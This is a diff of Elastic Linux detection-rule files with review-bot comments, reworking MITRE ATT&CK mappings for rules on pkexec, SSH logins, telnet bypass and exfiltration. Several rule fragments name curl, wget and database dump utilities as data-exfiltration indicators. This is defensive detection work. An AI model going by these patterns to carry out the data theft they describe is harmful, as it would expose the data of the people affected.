-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.name", "host.id"]
diff --git a/rules/linux/execution_unusual_path_invocation_from_command_line.toml b/rules/linux/execution_unusual_path_invocation_from_command_line.toml
index f5547ab6045..7c4599b99b1 100644
--- a/rules/linux/execution_unusual_path_invocation_from_command_line.toml
+++ b/rules/linux/execution_unusual_path_invocation_from_command_line.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
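Review bot: The added tables in this hunk are indented (`+ [rule.threat.tactic]`, `+ name = "Execution"`, `+ [[rule.threat.technique]]`), while the `[[rule.threat]]` and `framework` context lines above them and every other rule in this commit sit at column 0; the same indented block recurs in exfiltration_potential_curl_data_exfiltration.toml, exfiltration_potential_database_dumping.toml and exfiltration_potential_wget_data_exfiltration.toml. TOML ignores the leading whitespace, but the repository's rule files do not use it, and a formatting pass will rewrite these lines again, so it is better dropped now: `[rule.threat.tactic]` at column 0 like the rest. The T1014 Rootkit / Defense Evasion entry is removed in the same hunk and the preceding tags hunk drops `"Tactic: Defense Evasion"`, so a rule about processes impersonating kthreadd loses its evasion mapping; if that is intended, a sentence in the commit message would help the next reader.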
@@ -45,7 +45,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -105,19 +113,33 @@ In Linux environments, shell processes like bash or zsh execute commands, often
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
 [[rule.threat.technique.subtechnique]]
-id = "T1574.007"
-name = "Path Interception by PATH Environment Variable"
-reference = "https://attack.mitre.org/techniques/T1574/007/"
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.name"]
diff --git a/rules/linux/execution_unusual_pkexec_execution.toml b/rules/linux/execution_unusual_pkexec_execution.toml
index a08462182ae..0b613bb5b67 100644
--- a/rules/linux/execution_unusual_pkexec_execution.toml
+++ b/rules/linux/execution_unusual_pkexec_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
@@ -94,7 +94,17 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit
 - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Persistence",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -115,14 +125,28 @@ not (
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.command_line"]
diff --git a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml
index eba84332571..d26ede83d7b 100644
--- a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml
+++ b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/29"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/13"
 [rule]
 author = ["Elastic"]
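Review bot: T1548 Abuse Elevation Control Mechanism and the Privilege Escalation tactic are removed from this pkexec rule and replaced by T1059 (no sub-technique) under Execution, with a new T1543 / Persistence entry added; pkexec is an elevation mechanism, so T1548 was the mapping that named the behaviour and the tags hunk for this file drops `"Tactic: Privilege Escalation"` to match. Since the commit already shows the pattern of adding a second `[[rule.threat]]` block here, adding Execution and Persistence beside the existing T1548/TA0004 entry, rather than replacing it, keeps the privilege-escalation coverage.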
@@ -113,17 +113,12 @@ process.name == "curl" and ?process.parent.executable != null and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1048"
-name = "Exfiltration Over Alternative Protocol"
-reference = "https://attack.mitre.org/techniques/T1048/"
+ [rule.threat.tactic]
+ name = "Exfiltration"
+ id = "TA0010"
+ reference = "https://attack.mitre.org/tactics/TA0010/"
-[[rule.threat.technique]]
-id = "T1567"
-name = "Exfiltration Over Web Service"
-reference = "https://attack.mitre.org/techniques/T1567/"
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
+ [[rule.threat.technique]]
+ name = "Exfiltration Over Alternative Protocol"
+ id = "T1048"
+ reference = "https://attack.mitre.org/techniques/T1048/"
diff --git a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml
index 6f2664a7726..89aa348f4dd 100644
--- a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml
+++ b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
@@ -124,11 +124,6 @@ process where host.os.type == "linux" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1030"
-name = "Data Transfer Size Limits"
-reference = "https://attack.mitre.org/techniques/T1030/"
-
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
diff --git a/rules/linux/exfiltration_potential_database_dumping.toml b/rules/linux/exfiltration_potential_database_dumping.toml
index 993bc7a55aa..6f00692824d 100644
--- a/rules/linux/exfiltration_potential_database_dumping.toml
+++ b/rules/linux/exfiltration_potential_database_dumping.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/03/13"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/24"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -86,7 +86,7 @@ tags = [
 "Domain: Endpoint",
 "OS: Linux",
 "Use Case: Threat Detection",
- "Tactic: Collection",
+ "Tactic: Exfiltration",
 "Data Source: Elastic Defend",
 "Data Source: Crowdstrike",
 "Data Source: SentinelOne",
@@ -104,12 +104,12 @@ process.name in ("pg_dump", "pg_dumpall", "mysqldump", "mariadb-dump", "mongodum
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1213"
-name = "Data from Information Repositories"
-reference = "https://attack.mitre.org/techniques/T1213/"
+ [rule.threat.tactic]
+ name = "Exfiltration"
+ id = "TA0010"
+ reference = "https://attack.mitre.org/tactics/TA0010/"
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
+ [[rule.threat.technique]]
+ name = "Exfiltration Over Alternative Protocol"
+ id = "T1048"
+ reference = "https://attack.mitre.org/techniques/T1048/"
diff --git a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml
index d978c2aee6c..e0f16b19169 100644
--- a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml
+++ b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/07"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/13"
 [rule]
 author = ["Elastic"]
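Review bot: The `@@ -104,12 +104,12 @@` hunk header shows this rule matches local dump utilities (`pg_dump`, `pg_dumpall`, `mysqldump`, `mariadb-dump`, `mongodump`), which produce a dump on the host; that is the collection-from-an-information-repository behaviour the removed T1213/TA0009 mapping described, whereas the sole remaining technique T1048 Exfiltration Over Alternative Protocol describes the transfer off host that this rule does not observe. The `@@ -86,7 +86,7 @@` hunk makes the matching tag swap from `"Tactic: Collection"` to `"Tactic: Exfiltration"`. If the file is meant to live under Exfiltration for organisational reasons, keeping T1213 under a Collection `[[rule.threat]]` entry beside the new one keeps the technique honest about what the query detects. In the `@@ -2,7 +2,7 @@` hunk the old `updated_date` of `2026/03/24` is a day after the commit date, which suggests one side of that line is a typo.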
@@ -122,12 +122,12 @@ process.name == "wget" and ?process.parent.executable != null and (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1567"
-name = "Exfiltration Over Web Service"
-reference = "https://attack.mitre.org/techniques/T1567/"
+ [rule.threat.tactic]
+ name = "Exfiltration"
+ id = "TA0010"
+ reference = "https://attack.mitre.org/tactics/TA0010/"
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
+ [[rule.threat.technique]]
+ name = "Exfiltration Over Alternative Protocol"
+ id = "T1048"
+ reference = "https://attack.mitre.org/techniques/T1048/"
diff --git a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml
index 1e50445591e..f6d821c4711 100644
--- a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml
+++ b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -80,7 +80,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Exfiltration",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -163,12 +171,15 @@ from logs-endpoint.events.process-* metadata _id, _index, _version
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1048"
-name = "Exfiltration Over Alternative Protocol"
-reference = "https://attack.mitre.org/techniques/T1048/"
-
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
 reference = "https://attack.mitre.org/tactics/TA0010/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/impact_memory_swap_modification.toml b/rules/linux/impact_memory_swap_modification.toml
index f6ef7c656b6..2336a398314 100644
--- a/rules/linux/impact_memory_swap_modification.toml
+++ b/rules/linux/impact_memory_swap_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
@@ -81,7 +81,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Impact",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
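Review bot: After the `@@ -163,12 +171,15 @@` hunk this rule has no technique-level mapping at all: T1048 is removed from the Exfiltration entry, leaving only `[rule.threat.tactic]`, and the new Execution `[[rule.threat]]` block is likewise tactic-only. Tactic-only entries are valid in the schema, but any consumer that indexes rules by technique (coverage maps, the ATT&CK navigator export) will stop listing this rule, and a rule that fires on file-transfer utilities has a defensible technique in T1048. Keeping `id = "T1048"` under the Exfiltration entry preserves that; the same technique-removal-to-tactic-only change happens to T1030 in exfiltration_potential_data_splitting_for_exfiltration.toml.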
@@ -114,3 +125,21 @@ reference = "https://attack.mitre.org/techniques/T1496/"
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/impact_potential_bruteforce_malware_infection.toml b/rules/linux/impact_potential_bruteforce_malware_infection.toml
index 6f8a2777a56..93c5361d32a 100644
--- a/rules/linux/impact_potential_bruteforce_malware_infection.toml
+++ b/rules/linux/impact_potential_bruteforce_malware_infection.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/20"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/16"
 [rule]
 author = ["Elastic"]
@@ -83,7 +83,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Impact",
+ "Tactic: Execution",
+ "Tactic: Command and Control",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
 query = '''
@@ -157,11 +166,42 @@ from logs-endpoint.events.network-* metadata _id, _index, _version
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1110"
-name = "Brute Force"
-reference = "https://attack.mitre.org/techniques/T1110/"
+id = "T1496"
+name = "Resource Hijacking"
+reference = "https://attack.mitre.org/techniques/T1496/"
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/initial_access_first_time_public_key_authentication.toml b/rules/linux/initial_access_first_time_public_key_authentication.toml
index 9bc8e27141c..1e74cf2cb47 100644
--- a/rules/linux/initial_access_first_time_public_key_authentication.toml
+++ b/rules/linux/initial_access_first_time_public_key_authentication.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["system"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
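Review bot: T1110 Brute Force and the Credential Access tactic are removed outright, although the file name (impact_potential_bruteforce_malware_infection) and the `"Tactic: Credential Access"` tag dropped in the tags hunk for this file both say brute forcing is the behaviour being detected; the three new entries (T1496, T1059.004, T1071) describe what such malware does around the brute forcing, not the brute forcing itself. Since the hunk already adds two extra `[[rule.threat]]` blocks, adding T1110/TA0006 back as a fourth and restoring `"Tactic: Credential Access",` in the tags keeps the mapping aligned with the rule's stated purpose. The hunk header shows the query reads network events, which is consistent with keeping an outbound brute-force technique.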
@@ -82,7 +82,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -92,33 +99,16 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["system.auth.ssh.signature"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml index 75bb96d09b0..d1e0215d442 100644 
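Review bot: In the rewritten Initial Access entry `[rule.threat.tactic]` now precedes `[[rule.threat.technique]]`, the reverse of every other entry in this patch, and a stray blank line is left before `[rule.new_terms]`. This is valid TOML because `[[rule.threat.technique]]` still appends to the last `rule.threat` element, but the repository's rule normaliser emits technique-first, so the file will churn on the next formatting pass. Move the `[[rule.threat.technique]]` block for T1078 above `[rule.threat.tactic]` and drop the extra blank line. The two sibling SSH rules below carry the same ordering.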
--- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -75,7 +75,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -85,33 +92,16 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["related.ip"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml index 6abae46e1a9..ffc5417fe60 100644 --- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] 
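Review bot: Same ordering issue as the public-key rule above: `[rule.threat.tactic]` is placed before `[[rule.threat.technique]]` for T1078 and an extra blank line precedes `[rule.new_terms]`. Swap the two blocks so the technique comes first and remove the blank line to match the layout used by the other entries in this patch.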
@@ -59,7 +59,14 @@ SSH (Secure Shell) is a protocol used to securely access and manage Linux system risk_score = 21 rule_id = "5b8d7b94-23c6-4e3f-baed-3a4d0da4f19d" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -69,33 +76,16 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["related.user"] diff --git a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml index 56abd0cda0b..159ac1545b7 100644 --- a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml +++ b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml 
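Review bot: As in the two SSH rules above, the rewritten Initial Access entry puts `[rule.threat.tactic]` ahead of `[[rule.threat.technique]]` for T1078 and leaves an extra blank line before `[rule.new_terms]`. Reorder to technique-then-tactic and drop the blank line so the three SSH rules stay consistent with the rest of the patch.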
@@ -2,7 +2,7 @@ creation_date = "2026/01/24" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] @@ -76,7 +76,19 @@ references = [ risk_score = 99 rule_id = "ab7795cc-0e0b-4f9d-a934-1f17a58f869a" severity = "critical" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Resources: Investigation Guide", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne" +] timestamp_override = "event.ingested" type = "eql" @@ -89,13 +101,26 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/linux/lateral_movement_kubeconfig_file_activity.toml b/rules/linux/lateral_movement_kubeconfig_file_activity.toml index 7f53f2f17ee..742506ac792 100644 --- a/rules/linux/lateral_movement_kubeconfig_file_activity.toml 
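Review bot: The added Lateral Movement entry has uneven spacing: the blank line after `framework = "MITRE ATT&CK"` is removed in the Initial Access entry, two blank lines sit between the T1210 reference and `[rule.threat.tactic]`, and the file now ends with an added empty line; the tags list is also the only one in this patch without a trailing comma after `"Data Source: SentinelOne"`. None of this changes semantics, but it deviates from the layout every other rule here uses and will be rewritten on the next normalisation pass, so restore a single blank line between sections and add the trailing comma. T1210 Exploitation of Remote Services is a reasonable second mapping for a telnet authentication bypass exploited from a remote host.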
+++ b/rules/linux/lateral_movement_kubeconfig_file_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -87,7 +87,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Defend for Containers", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
